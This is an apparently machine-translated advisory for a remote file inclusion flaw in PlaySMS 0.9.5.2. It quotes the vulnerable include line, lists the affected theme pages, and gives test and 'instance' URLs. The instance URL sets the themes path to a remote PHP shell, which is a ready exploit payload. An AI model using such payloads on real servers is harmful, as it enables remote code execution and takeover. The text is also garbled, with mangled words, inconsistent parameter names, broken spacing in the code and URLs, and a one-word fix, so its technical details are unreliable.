[O] PlaySMS <= Remote File compression sion Vulnerability
Software: PlaySMS ver 0.9.5.2
Official program: http://playsms.org/
Author: NoGe www.2cto.com
========================================================== ========================================================== ==================================
[O] Defect Analysis
<? Php include $ receiv_path ['themes']. "/". $ themes_module. "/header. php";?>
Affected all this files
Web/plugin/themes/default/page_forgot.php
Web/plugin/themes/default/page_login.php
Web/plugin/themes/default/page_noaccess.php
Web/plugin/themes/default/page_register.php
Web/plugin/themes/km/ page_noaccess.php
Web/plugin/themes/work2/page_forgot.php
Web/plugin/themes/work2/page_login.php
Web/plugin/themes/work2/page_noaccess.php
Web/plugin/themes/work2/page_register.php
[O] Test
Http://www.bkjia.com/[path]/web/plugin/themes/default/page_forgot.php? Export _path [themes] = [RFI]
[O] instance
Http://www.bkjia.com/[path]/web/plugin/themes/default/page_forgot.php? Export _path [themes] = http: // phpshell?
========================================================== ========================================================== ==================================
Fix: Filter